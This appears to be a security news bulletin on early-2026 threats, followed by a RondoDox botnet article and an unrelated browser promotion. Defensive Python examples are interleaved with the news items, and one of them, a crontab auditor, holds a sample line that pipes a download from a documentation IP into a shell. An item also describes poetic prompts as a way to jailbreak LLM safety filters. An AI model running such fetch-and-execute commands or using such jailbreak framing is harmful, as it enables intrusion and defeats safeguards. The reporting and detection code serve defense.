ThreatsDay Bulletin: GhostAd Drain, macOS Attacks, Proxy Botnets, Cloud Exploits, and 12+ Stories

The first ThreatsDay Bulletin of 2026 lands on a day that already feels symbolic — new year, new breaches, new tricks. If the past twelve months taught defenders anything, it’s that threat actors don’t pause for holidays or resolutions. They just evolve faster. This week’s round-up shows how subtle shifts in behavior, from code tweaks to job scams, are rewriting what “cybercrime” looks like in practice.

Across the landscape, big players are being tested, familiar threats are mutating, and smaller stories are quietly signaling bigger patterns ahead. The trend isn’t about one big breach anymore; it’s about many small openings that attackers exploit with precision. The pace of exploitation, deception, and persistence hasn’t slowed; it’s only become more calculated. Each update in this edition highlights how the line between normal operations and compromise is getting thinner by the week.

Here’s a sharp look at what’s moving beneath the surface of the cybersecurity world as 2026 begins.

KMSAuto malware scam busted
Lithuanian National Extradited to S. Korea for Allegedly Distributing Malware

A Lithuanian national has been arrested for his alleged involvement in infecting 2.8 million systems with clipboard-stealing malware disguised as the KMSAuto tool for illegally activating Windows and Office software. The 29-year-old man has been extradited from Georgia to South Korea.

“From April 2020 to January 2023, the hacker distributed 2.8 million copies worldwide of malware disguised as an illegal Windows license activation program (KMSAuto),” South Korean authorities said. “Through this malware, the hacker stole virtual assets worth approximately KRW 1.7 billion ($1.2 million) in 8,400 transactions from users of 3,100 virtual asset addresses.” The suspect is alleged to have used KMSAuto as a lure to trick victims into downloading a malicious executable that functioned as clipper malware.

Holiday ColdFusion exploit spree
Coordinated Campaign Targets Adobe ColdFusion

A new “coordinated exploitation” campaign has been observed targeting Adobe ColdFusion servers over the Christmas 2025 holiday period. “The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited),” GreyNoise said.

“This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024.” The activity originated from 8 unique IP addresses and leveraged 10 different CVEs (CVE-2023-26359, CVE-2023-38205, CVE-2023-44353, CVE-2023-38203, CVE-2023-38204, CVE-2023-29298, CVE-2023-29300, CVE-2023-26347, CVE-2024-20767, and CVE-2023-44352) to target the U.S., Spain, India, Canada, Chile, Germany, Pakistan, Cambodia, Ecuador, and France. Some of the payloads deployed following exploitation enable direct code execution, credential harvesting (by reading “/etc/passwd”), and JNDI lookups.

Android tablets backdoored
Kaspersky Discovers New Keenadu Pre-Installed Malware

Kaspersky said it discovered pre-installed malware on certain models of tablets running Android. The malware has been codenamed Keenadu.

“It’s a backdoor in libandroid_runtime.so,” the Russian cybersecurity company said. While the company has yet to provide additional details, backdoors of this kind can allow remote access for data exfiltration, command execution, and other forms of post-exploitation.

AI jailbreak hub shut down: r/ChatGPTjailbreak Subreddit Banned

Reddit has taken the step of banning r/ChatGPTJailbreak, a community of over 229,000 users dedicated to finding workarounds and jailbreaks for safety filters and guardrails erected by developers of large language models (LLMs). Reddit said the “community was banned for violating Rule 8,” which refers to any effort that could break the site or interfere with its normal use.

“Do not interrupt the serving of Reddit, introduce malicious code onto Reddit, make it difficult for anyone else to use Reddit due to your actions, block sponsored headlines, create programs that violate any of our other API rules, or assist anyone in misusing Reddit in any way,” the rule states. The move follows a WIRED report about how some chatbot users were sharing instructions on generating non-consensual deepfakes using photos of fully clothed women. Following the ban, the community has resurfaced at chatgptjailbreak.tech on a federated alternative called Lemmy. While the subreddit sprang up as a red teaming hub for discussing AI jailbreaks, content shared on the forum also had the potential to trigger indirect prompt injections: the data (along with everything else posted on the platform) powers Reddit Answers and serves as a real-time dataset for other models that use retrieval-augmented generation (RAG) to incorporate new information.

The development comes as prompt injections and jailbreaks continue to plague artificial intelligence (AI) systems, with actors, both good and bad, continuously exploring ways to circumvent protections put in place to prevent misuse. Indeed, a new study from Italy’s Icaro Lab, Sapienza University of Rome, and Sant’Anna School of Advanced Studies found that adversarial poetic prompts have a higher attack-success rate (ASR) against LLMs and cause them to skirt contemporary safety mechanisms designed to block production of explicit or harmful content like child sex abuse material, hate speech, and instructions on how to make chemical and nuclear weapons. “When prompts with identical task intent were presented in poetic rather than prose form, the Attack Success Rate (ASR) increased from 8.08% to 43.07%, on average – a fivefold increase,” researchers said.

Macs join GlassWorm hitlist: GlassWorm Shows Up Again, This Time Targeting Macs

The supply chain campaign known as GlassWorm has resurfaced a fourth time with three suspicious extensions on the Open VSX marketplace that are designed to exclusively target macOS users.

These extensions attracted 50,000 downloads. The primary objective of these extensions is to target over 50 browser extension wallets and steal funds. The names of the extensions are: studio-velte-distributor.pro-svelte-extension, cudra-production.vsce-prettier-pro, and Puccin-development.full-access-catppuccin-pro-extension. Conspicuously absent are the invisible Unicode techniques and the Rust binaries.

“This time, the payload is wrapped in AES-256-CBC encryption and embedded in compiled JavaScript – but the core mechanism remains the same: fetch the current C2 endpoint from Solana, execute what it returns,” Koi said. “What’s new is the target: code designed to replace hardware wallet applications with trojanized versions.” As of December 29, 2025, the C2 server endpoints for the trojanized wallets are returning empty files, suggesting that the campaign is still under development. The targeting of Macs is intentional, as the devices are prevalent in cryptocurrency, Web3, and startup environments. The shift is complemented by the use of AppleScript for stealth execution instead of PowerShell and LaunchAgents for persistence.

The malware, besides waiting for 15 minutes before activating its malicious behavior, is designed to facilitate the theft of the iCloud Keychain database and developer credentials, such as GitHub tokens, npm tokens, and the contents of the ~/.ssh directory.

Regulators misled by cleanup tactic: Meta Drafted “Playbook” to Stall Efforts to Tackle Scammers

With Meta attracting scrutiny for allowing scammers to advertise through its platform, a new report from Reuters found that the company attempted to fend off pressure from regulators to crack down on the threat by making scam ads and problematic content “not findable” when authorities searched for them through its Ad Library, at the same time as it launched an “enforcement blitz” to reduce the volume of offending ads. “To perform better on that test, Meta staffers found a way to manage what they called the ‘prevalence perception’ of scam ads returned by Ad Library searches, the documents show. First, they identified the top keywords and celebrity names that Japanese Ad Library users employed to find the fraudulent ads. Then they ran identical searches repeatedly, deleting ads that appeared fraudulent from the library and Meta’s platforms,” Reuters reported. “The tactic successfully removed some fraudulent advertising of the sort that regulators would want to weed out. But it also served to make the search results that Meta believed regulators were viewing appear cleaner than they otherwise would have.” The search result cleanup effort was so successful that Japanese regulators did not enforce rules that would otherwise have required it to verify the identity of all its advertisers. The tactic was then added to its “general global playbook” to avoid regulatory scrutiny in other markets, including the U.S., Europe, India, Australia, Brazil, and Thailand, according to leaked internal documents.

Meta has pushed back against the claims, stating that the cleaning effort also removes the ads from its systems.

Smart contract upgrade exploited: Unleash Protocol Loses $3.9M in Crypto Following Hack

The decentralized intellectual property platform Unleash Protocol said it “detected unauthorized activity” involving its smart contracts that led to the withdrawal and transfer of user funds worth approximately $3.9 million, per blockchain security company PeckShield. “Our initial investigation indicates that an externally owned address gained administrative control via Unleash’s multisig governance and carried out an unauthorized contract upgrade,” it said. “This upgrade enabled asset withdrawals that were not approved by the Unleash team and occurred outside our intended governance and operational procedures.” Once they were withdrawn, the assets were bridged using third-party infrastructure and transferred to external addresses.

The incident originated within Unleash Protocol’s governance and permission framework, the company added. The stolen funds have been deposited into the Tornado Cash cryptocurrency mixing service in the form of 1,337.1 ETH. Users are advised to refrain from interacting with Unleash Protocol contracts until further notice.

FTC fines Disney over COPPA: Disney to Pay $10M to Settle Children’s Privacy Violations in the U.S.

The U.S. Justice Department (DoJ) said Disney has agreed to pay a $10 million civil penalty as part of a settlement to resolve Federal Trade Commission (FTC) allegations that the entertainment giant violated children’s privacy laws in connection with its YouTube video content. The FTC had argued that Disney failed to correctly designate YouTube video content as directed toward children, allowing the company to serve targeted ads on the platform and unlawfully collect their information without parental notice and consent. The order also bars Disney from operating on YouTube in a manner that violates child privacy laws in the U.S. and requires it to create a program that will ensure it properly complies with COPPA on YouTube going forward.

Fake glitch scam toolkit exposed: New ErrTraffic Service Enables ClickFix Attacks via Fake Browser Glitches

A new cybercrime tool called ErrTraffic allows threat actors to automate ClickFix attacks by generating fake glitches on compromised websites to induce a false sense of urgency and deceive users into following malicious instructions. Hudson Rock, which detailed the toolkit, said the “comprehensive software suite industrializes the deployment of ClickFix lures.” The service, advertised by a threat actor named “LenAI,” is a cross-platform threat capable of targeting Windows, macOS, Linux, and Android to deliver tailored payloads. The ErrTraffic control panel is a self-hosted PHP application that incorporates hard-coded exclusions for Commonwealth of Independent States (CIS) countries.

Once set up, an attacker can connect the panel to compromised websites via a single line of HTML injection. This allows them to serve information stealers and Android banking trojans via ClickFix-style instructions that claim to fix the issue by installing a browser update, downloading a system font, or pasting something in the command prompt.

Magecart evolves into ID theft: New Magecart Campaign Discovered

Source Defense Research has flagged a new global Magecart campaign that hijacks checkout and account creation flows. The activity leverages modular, localized payloads targeting services like Stripe, Mollie, PagSeguro, OnePay, and PayPal.

It “uses fake payment forms, phishing iframes, and silent skimming, plus anti-forensics tricks (hidden inputs, Luhn-valid junk cards).” The activity is also designed to steal credentials and personal information, enabling account takeovers and long-term persistence via rogue admin access. “This is Magecart evolving into [a] full identity compromise,” it said.

Deniable cyber activism detailed: How Hacktivist Proxies Offer Plausible Deniability

Hacktivist proxy operations refer to activities in which ideologically aligned, non-state cyber groups conduct disruptive operations that align with state geopolitical interests without requiring formal sponsorship, command-and-control, or direct tasking. These activities primarily rely on public claims, volunteer participation, and low-complexity techniques to impose psychological, political, and operational costs on adversaries while allowing the benefiting state to enjoy plausible deniability.

“The model follows a consistent activation sequence: geopolitical trigger events such as sanctions, military assistance announcements, or diplomatic escalations are followed by rapid narrative mobilization in hacktivist communication channels, volunteer coordination, targeted disruptive activity (primarily DDoS attacks, defacement, and symbolic intrusions), and public amplification of claimed impact,” CYFIRMA said. “Activity typically de-escalates once signalling objectives are achieved, distinguishing these operations from sustained cybercrime or espionage campaigns.” The development comes as cyber operations have become an integral component of pursuing strategic geopolitical objectives. Under the Hacktivist Proxy Operations model, ideologically aligned cyber groups function as deniable instruments of pressure without direct control from the state. This allows hacktivist groups to apply disruptive force or shape narratives in a manner that gives the state a strategic advantage without assuming explicit responsibility.

OceanLotus adapts to Xinchuang: OceanLotus Targets China’s Xinchuang Initiative

In 2022, the Chinese government ramped up a major initiative called Xinchuang that aims for technological self-reliance by replacing foreign hardware and software with domestic alternatives in key sectors like government and finance, with an aim to build an independent IT ecosystem and mitigate geopolitical risks. According to a new report from QiAnXin, the OceanLotus group has been targeting such domestic information innovation platforms and Windows systems using phishing lures containing desktop files, PDF documents, and Java Archive (JAR) files to download next-stage payloads. As of mid-2025, the threat actor was observed exploiting CVE-2023-52076 (CVSS score: 8.5), a remote code execution flaw impacting the Atril document viewer, to launch a desktop file that ultimately executes a Python downloader. “The ELF Trojan released by the OceanLotus group on indigenous innovation platforms has slight differences from traditional Linux ELF files,” QiAnXin said.

“This indigenous innovation Trojan achieves a precise compatibility attack by zeroing out the three bytes following the ELF file Magic Number (used to identify bitness, endianness, and version). This results in traditional Linux systems refusing to execute the file due to format errors, while the indigenous innovation platform can parse and run it normally. This carefully designed detail fully demonstrates OceanLotus’s in-depth understanding of the underlying operation mechanism of domestic indigenous innovation systems.” Also deployed by OceanLotus is a passive backdoor targeting IoT devices such as routers.

AWS key deletion delay risk: Exploiting AWS IAM Eventual Consistency for Persistence

Researchers have found that AWS IAM eventual consistency creates a 4-second window that attackers can exploit, allowing them to leverage deleted AWS access keys.
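Back to the OceanLotus ELF detail: the header tweak QiAnXin describes (bytes 4, 5 and 6 of e_ident zeroed) is straightforward to check for on the defender side. The following is an added Python example, not code from QiAnXin or from the report. It builds two constructed 64-byte ELF64 headers, one conforming and one with those three bytes zeroed, and shows both an e_ident inspector that flags the anomaly and a strict header parser that, like a conforming Linux loader, cannot proceed without a valid EI_CLASS and EI_DATA. The function names and the sample headers are my own; the offsets and constants are from the ELF specification.

```python
import struct

# Offsets within the 16-byte e_ident array, per the ELF specification.
ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA, EI_VERSION = 4, 5, 6
CLASS_NAMES = {1: "ELF32", 2: "ELF64"}
DATA_NAMES = {1: "little-endian", 2: "big-endian"}
EV_CURRENT = 1

# Header layouts after e_ident: e_type, e_machine, e_version, e_entry,
# e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum,
# e_shentsize, e_shnum, e_shstrndx (pointer-sized fields differ by class).
LAYOUT = {1: "HHIIIIIHHHHHH", 2: "HHIQQQIHHHHHH"}
FIELDS = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff",
          "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
          "e_shentsize", "e_shnum", "e_shstrndx")


def inspect_elf_ident(data: bytes) -> dict:
    """Inspect e_ident and flag headers whose class/data/version bytes are invalid.

    A conforming loader rejects such a file (ENOEXEC) because it cannot tell
    bitness or byte order; a more permissive loader may still run it.
    """
    if len(data) < 16 or data[:4] != ELF_MAGIC:
        return {"is_elf": False}
    ei_class, ei_data, ei_version = data[EI_CLASS], data[EI_DATA], data[EI_VERSION]
    zeroed = (ei_class, ei_data, ei_version) == (0, 0, 0)
    malformed = (ei_class not in CLASS_NAMES or ei_data not in DATA_NAMES
                 or ei_version != EV_CURRENT)
    return {
        "is_elf": True,
        "class": CLASS_NAMES.get(ei_class, "invalid"),
        "data": DATA_NAMES.get(ei_data, "invalid"),
        "version": ei_version,
        "ident_zeroed": zeroed,          # the exact pattern described above
        "suspicious": malformed,         # zeroed bytes are one case of this
    }


def parse_elf_header(data: bytes) -> dict:
    """Strict parse of the full ELF header; raises where a conforming loader would."""
    info = inspect_elf_ident(data)
    if not info["is_elf"]:
        raise ValueError("not an ELF file")
    if info["suspicious"]:
        raise ValueError("cannot determine header layout: EI_CLASS/EI_DATA/EI_VERSION invalid")
    endian = "<" if data[EI_DATA] == 1 else ">"
    fmt = endian + LAYOUT[data[EI_CLASS]]
    size = struct.calcsize(fmt)
    return dict(zip(FIELDS, struct.unpack(fmt, data[16:16 + size])))


def find_suspicious(samples: dict) -> list:
    """Return the names of samples whose e_ident a strict loader would refuse."""
    return [name for name, blob in samples.items()
            if inspect_elf_ident(blob).get("suspicious")]


def build_sample_header(zero_ident: bool = False) -> bytes:
    """Constructed minimal ELF64 x86-64 header (64 bytes), for demonstration only."""
    ident = bytearray(16)
    ident[0:4] = ELF_MAGIC
    if not zero_ident:
        ident[EI_CLASS], ident[EI_DATA], ident[EI_VERSION] = 2, 1, EV_CURRENT
    # e_type=ET_EXEC(2), e_machine=EM_X86_64(0x3E), e_version=1, zero entry and
    # offsets, then the fixed sizes a real ELF64 header carries.
    rest = struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0, 0, 0, 0, 64, 56, 0, 64, 0, 0)
    return bytes(ident) + rest


SAMPLE_NORMAL = build_sample_header()
SAMPLE_ZEROED = build_sample_header(zero_ident=True)

if __name__ == "__main__":
    for name, blob in {"normal": SAMPLE_NORMAL, "zeroed": SAMPLE_ZEROED}.items():
        print(name, inspect_elf_ident(blob))
    print("flagged:", find_suspicious({"normal": SAMPLE_NORMAL, "zeroed": SAMPLE_ZEROED}))
```

Run over a directory of binaries, `find_suspicious` is the triage view and `parse_elf_header` the confirmation: a file that fails the strict parse yet was found on a host as an executed process is exactly the mismatch the report describes.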

“The cause is eventual consistency in AWS Identity and Access Management and, if improperly handled, can be exploited by attackers to have access in your AWS environment, even after defenders believe credentials are revoked,” OFFENSAI said. “The distributed nature of AWS infrastructure means that credential validation, caching layers, and edge services may create brief windows where revoked access keys remain temporarily valid. In short, the attacker can use a deleted set of access keys to create a new one, achieving persistence this way.” To mitigate any potential security risks, AWS customers are advised to avoid long-term IAM access keys and instead use temporary credentials or leverage IAM roles and federation for programmatic access to AWS services.

New global proxy botnet uncovered: New IPCola Proxy Network Emerges

A new proxy network called IPCola (“ipcola[.]com”) has claimed to offer more than 1.6 million unique IP addresses comprising IoT, desktop, and mobile devices from over 100 countries for sale.
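On the AWS IAM item above: whatever the length of the consistency window, the durable signal for a defender is a deleted access key that still appears as the caller in CloudTrail after its DeleteAccessKey event, and above all one that mints a replacement via CreateAccessKey. The Python below is an added example, not OFFENSAI's or AWS's code. It runs over a handful of constructed CloudTrail-shaped events (placeholder key IDs, made-up 2026-01-05 timestamps), flags any call made with a key at or after its deletion time, and also taints and flags keys that such a call created. The function names and the sample events are my own; the field names used (eventTime, eventName, eventSource, userIdentity.accessKeyId, requestParameters, responseElements) are standard CloudTrail record fields.

```python
from datetime import datetime, timezone


def parse_event_time(stamp: str) -> datetime:
    """CloudTrail eventTime is ISO-8601 in UTC, e.g. 2026-01-05T10:00:00Z."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_post_revocation_use(events: list) -> list:
    """Flag calls made with an access key after that key's DeleteAccessKey event.

    Any key created by such a call is tainted, so later use of the replacement
    key is reported too. Returns one finding dict per offending call.
    """
    deleted_at = {}   # accessKeyId -> time of its DeleteAccessKey
    tainted = {}      # replacement key -> revoked key that created it
    findings = []
    for ev in sorted(events, key=lambda e: parse_event_time(e["eventTime"])):
        when = parse_event_time(ev["eventTime"])
        caller = ev.get("userIdentity", {}).get("accessKeyId")
        reason = None
        if caller in deleted_at and when >= deleted_at[caller]:
            delay = (when - deleted_at[caller]).total_seconds()
            reason = f"revoked key used {delay:g}s after deletion"
        elif caller in tainted:
            reason = f"key was created by revoked key {tainted[caller]}"
        if reason:
            finding = {"accessKeyId": caller, "eventName": ev["eventName"],
                       "eventTime": ev["eventTime"], "reason": reason,
                       "persistence": False}
            if ev["eventName"] == "CreateAccessKey" and ev.get("responseElements"):
                new_key = ev["responseElements"]["accessKey"]["accessKeyId"]
                tainted[new_key] = caller
                finding["persistence"] = True
                finding["newAccessKeyId"] = new_key
            findings.append(finding)
        # Record deletions after the check, so the deletion call itself (which may
        # legitimately be made with any key) is never flagged.
        if ev["eventName"] == "DeleteAccessKey" and ev.get("eventSource") == "iam.amazonaws.com":
            deleted_at[ev["requestParameters"]["accessKeyId"]] = when
    return findings


# Constructed sample events (placeholder key IDs, not real credentials).
SAMPLE_EVENTS = [
    {"eventTime": "2026-01-05T09:59:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets",
     "userIdentity": {"accessKeyId": "AKIAREVOKEDEXAMPLE", "userName": "ci-deploy"}},
    {"eventTime": "2026-01-05T10:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "DeleteAccessKey",
     "userIdentity": {"accessKeyId": "AKIAADMINEXAMPLE", "userName": "sec-admin"},
     "requestParameters": {"userName": "ci-deploy", "accessKeyId": "AKIAREVOKEDEXAMPLE"}},
    {"eventTime": "2026-01-05T10:00:02Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey",
     "userIdentity": {"accessKeyId": "AKIAREVOKEDEXAMPLE", "userName": "ci-deploy"},
     "requestParameters": {"userName": "ci-deploy"},
     "responseElements": {"accessKey": {"accessKeyId": "AKIANEWEXAMPLE",
                                        "userName": "ci-deploy", "status": "Active"}}},
    {"eventTime": "2026-01-05T10:00:03Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets",
     "userIdentity": {"accessKeyId": "AKIAREVOKEDEXAMPLE", "userName": "ci-deploy"}},
    {"eventTime": "2026-01-05T10:05:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets",
     "userIdentity": {"accessKeyId": "AKIANEWEXAMPLE", "userName": "ci-deploy"}},
]

if __name__ == "__main__":
    for finding in find_post_revocation_use(SAMPLE_EVENTS):
        print(finding)
```

The ordering matters: the check runs before the deletion is recorded, so an administrator deleting a key is never self-flagged, while the 10:00:02 CreateAccessKey made with the just-deleted key is reported with `persistence` set and the replacement key carried forward. Feeding this real CloudTrail history also gives a direct measurement of how long after deletion a key was last honoured in your account.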

A majority of the infected devices are located in India, Brazil, Mexico, and the U.S. “IPCola is a non-KYC proxy provider, allowing anyone to sign up on the platform, deposit crypto, and […] start using the proxies without restriction,” Synthient said. “Like most platforms, IPCola allows users to purchase residential, datacenter, and ISP proxies, each with its own drawbacks and advantages.” Further infrastructure analysis has revealed that the service is powered by GaGaNode, a decentralized bandwidth monetization service that enables users and publishers to earn cryptocurrency for their bandwidth or monetize other people’s bandwidth. Users either have an option to run the standalone GaGaNode application or integrate into their apps a software development kit (SDK) that implements the proxy functionality.

More significantly, the SDK facilitates remote code execution (RCE) on any device running the SDK, representing a major escalation of the threat. It’s believed that a Chinese company named NuoChen is behind IPCola and its Chinese-only version, InstaIP.

Hidden ad fraud drains devices: GhostAd and SkyWalk Adware Targets Android, iOS

A large-scale Android adware campaign has been observed silently draining resources and interfering with normal phone use through persistent background activity. The campaign, dubbed GhostAd, leverages a network of at least 15 Android applications on Google Play masquerading as harmless utility and emoji-editing tools.

These apps were cumulatively downloaded millions of times, with one of the apps reaching the #2 spot in Google Play’s “Top Free Tools” category. The names of some of the apps are Vivid Clean and GenMoji Studio. All these apps have since been removed from Google Play. “Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said.

Besides enabling persistent execution via a foreground service, the malware uses a JobScheduler to trigger ad-loading tasks every time it’s terminated. The attacks appear to be concentrated around the Philippines, Pakistan, and Malaysia. “GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies,” the company said. “Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle. This design quietly generates ad impressions and revenue, all while draining device resources.”

In a related development, DoubleVerify revealed details of a fraud scheme codenamed SkyWalk that uses innocent-seeming iOS gaming apps to charge advertisers for phony ad impressions. The operation uses a set of iOS games that serve ads inside invisible browser windows using the UniSkyWalking iOS mobile framework. “But when a user opens one, the app also secretly launches hidden websites on the user’s iOS device,” DoubleVerify said. “As the user plays ‘Sushi Party’ or ‘Bicycle Race’ in the app, the hidden sites run in the background, undetected, serving ads no one sees. Impressions are reported. Advertisers get billed. Not a single ad is viewed by a human.”

Amazon thwarts DPRK job infiltration: Amazon Blocks N. Korea IT Worker Scheme

Hackers affiliated with North Korea (aka DPRK) stole more than $2 billion worth of cryptocurrency in 2025, a significant increase from the roughly $1.3 billion recorded in 2024.

This includes the record-breaking $1.5 billion Bybit heist in February 2025. Despite the overall jump in stolen cryptocurrency in 2025, the actual frequency of attacks conducted by North Korean hackers has declined. This drop in operational tempo in the wake of the Bybit hack is likely an attempt to focus on laundering the stolen cryptocurrency. At the same time, Pyongyang’s crypto theft operations are increasingly relying on its IT workers to land jobs at cryptocurrency exchanges, custodians, and Web3 companies.

While North Korea’s effort to infiltrate Western companies with fake IT workers is well-known, 2025 may have been the first time the IT army has shifted from securing positions to posing as recruiters for crypto and other types of Web3 businesses. As part of these efforts, the threat actors run fake technical assessments that grant them unauthorized access to developer machines and ultimately steal credentials and source code, giving them remote access to target networks. The pervasive threat posed by the IT worker scheme was exemplified recently by Amazon, which has stopped more than 1,800 suspected North Korean operatives from joining its workforce since April 2024. “We’ve detected 27% more DPRK-affiliated applications quarter over quarter this year,” the tech giant’s chief security officer, Stephen Schmidt, said last month.

In one case, Amazon said it caught an IT worker by identifying an “infinitesimal delay in the typed commands.” The IT worker was hired by an Amazon contractor and was subsequently ousted from their systems within days. “For years, the regime has weaponized crypto theft as a revenue engine for weapons proliferation, sanctions evasion, and destabilizing activity,” TRM Labs said. “What the last three years make unmistakably clear is that North Korea is the most sophisticated, financially motivated cyber operator in the crypto theft ecosystem.”

The year starts with no pause, just new tricks and quieter attacks. Hackers are getting smarter, not louder.

Each story here connects to a bigger shift: less noise, more precision. 2026 is already testing how alert we really are. The threats that matter now don’t shout. They blend in — until they don’t.


RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers

Cybersecurity researchers have disclosed details of a persistent nine-month-long campaign that has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector, CloudSEK said in an analysis. React2Shell is the name assigned to a critical security vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to statistics from the Shadowserver Foundation, there are about 90,300 instances that remain susceptible to the vulnerability as of December 31, 2025, out of which 68,400 instances are located in the U.S., followed by Germany (4,300), France (2,800), and India (1,500).

RondoDox, which emerged in early 2025, has broadened its scale by adding new N-day security vulnerabilities to its arsenal, including CVE-2023-1389 and CVE-2025-24893. It’s worth noting that the abuse of React2Shell to spread the botnet was previously highlighted by Darktrace, Kaspersky, and VulnCheck. The RondoDox botnet campaign is assessed to have gone through three distinct phases prior to the exploitation of CVE-2025-55182:

- March - April 2025: Initial reconnaissance and manual vulnerability scanning
- April - June 2025: Daily mass vulnerability probing of web applications like WordPress, Drupal, and Struts2, and IoT devices like Wavlink routers
- July - early December 2025: Hourly automated deployment on a large scale

In the attacks detected in December 2025, the threat actors are said to have initiated scans to identify vulnerable Next.js servers, followed by attempts to drop cryptocurrency miners (“/nuts/poop”), a botnet loader and health checker (“/nuts/bolts”), and a Mirai botnet variant (“/nuts/x86”) on infected devices. “/nuts/bolts” is designed to terminate competing malware and coin miners before downloading the main bot binary from its command-and-control (C2) server.

One variant of the tool has been found to remove known botnets, Docker-based payloads, artifacts left from prior campaigns, and associated cron jobs, while also setting up persistence using “/etc/crontab.” “It continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds, effectively preventing reinfection by rival actors,” CloudSEK said. To mitigate the risk posed by this threat, organizations are advised to update Next.js to a patched version as soon as possible, segment all IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor for suspicious process execution, and block known C2 infrastructure.
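The “/etc/crontab” persistence CloudSEK mentions is the part of this chain a host owner can audit directly. Below is an added Python example, not CloudSEK's tooling. It parses /etc/crontab-format text (the sample is constructed, with a TEST-NET documentation address standing in for a real download host and the “/nuts/bolts” path taken from the report) and flags entries that fetch-and-execute from a remote URL, run from world-writable temp directories, or do either on an every-minute schedule. Function names and the sample are my own; the /proc-scanning behaviour the report describes is not modelled here.

```python
import re

TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# curl/wget whose output is piped or chained straight into a shell or chmod.
FETCH_PIPE_RE = re.compile(r"\b(curl|wget)\b[^|;&]*(\||;|&&)\s*(sh|bash|chmod)\b")
URL_RE = re.compile(r"https?://\S+")
FETCH_RE = re.compile(r"\b(curl|wget)\b")


def parse_crontab(text: str, system: bool = True) -> list:
    """Parse crontab text into dicts with line, schedule, user and command.

    Comments and VAR=value lines are skipped. system=True selects the
    /etc/crontab format, which has a user field before the command.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                     # @reboot, @hourly, ...
            fields = line.split(None, 1)
            sched, rest = fields[0], fields[1] if len(fields) > 1 else ""
        else:
            fields = line.split(None, 5)             # five time fields + rest
            if len(fields) < 6:
                continue
            sched, rest = " ".join(fields[:5]), fields[5]
        user = None
        if system:
            parts = rest.split(None, 1)
            if len(parts) < 2:
                continue
            user, rest = parts
        entries.append({"line": lineno, "schedule": sched, "user": user, "command": rest})
    return entries


def audit_entry(entry: dict) -> list:
    """Return the reasons an entry looks like download-and-execute persistence."""
    cmd = entry["command"]
    reasons = []
    if FETCH_PIPE_RE.search(cmd):
        reasons.append("remote fetch piped or chained into a shell")
    elif URL_RE.search(cmd) and FETCH_RE.search(cmd):
        reasons.append("downloads from a remote URL")
    if any(tok.startswith(TMP_DIRS) for tok in cmd.split()):
        reasons.append("executes or references a world-writable temp directory")
    if reasons and entry["schedule"] == "* * * * *":
        reasons.append("runs every minute (re-fetch loop)")
    return reasons


def audit_crontab(text: str, system: bool = True) -> list:
    """Entries from the crontab text that have at least one audit finding."""
    return [dict(entry, reasons=audit_entry(entry))
            for entry in parse_crontab(text, system) if audit_entry(entry)]


# Constructed /etc/crontab sample: three stock Debian-style lines followed by
# two entries of the kind this audit is meant to surface. 198.51.100.0/24 is
# a documentation (TEST-NET-2) range, not a real host.
SAMPLE_CRONTAB = """\
# constructed sample, not a captured file
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
@reboot         root    /usr/local/bin/backup-agent --daemon
* * * * *       root    curl -s http://198.51.100.23/nuts/bolts | sh
*/5 * * * *     root    /dev/shm/.x/bot >/dev/null 2>&1
"""

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {finding['line']} ({finding['schedule']}): {finding['command']}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

For per-user crontabs (`crontab -l` output) call `audit_crontab(text, system=False)`, since those lines carry no user field. The checks are deliberately behavioural rather than IoC-driven, so the same audit still fires when the download host or path changes.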

How To Browse Faster and Get More Done Using Adapt Browser

As web browsers evolve into all-purpose platforms, performance and productivity often suffer. Feature overload, excessive background processes, and fragmented workflows can slow down browsing sessions and introduce unnecessary friction, especially for users who rely on the browser as a primary work environment. This article explores how adopting a lightweight, task-focused browser, like Adapt Browser, can help users browse faster, reduce distractions, and complete everyday tasks more efficiently, without relying on heavy extensions or complex configurations.

The Productivity Problem With Modern Browsing

For many professionals, the browser functions as a central hub for research, communication, content consumption, and operational work.

However, common challenges persist:

- High CPU and memory usage caused by background services
- Excessive tab proliferation leading to loss of context
- Frequent switching between browser tabs and external applications
- Reliance on extensions that negatively impact performance and stability

These issues are not always caused by the websites themselves, but by how browsers manage processes, interfaces, and workflows. This emphasizes the importance of using a fast, lightweight browser. Some fast browsing options include Adapt Browser, Opera, Edge, and Vivaldi.

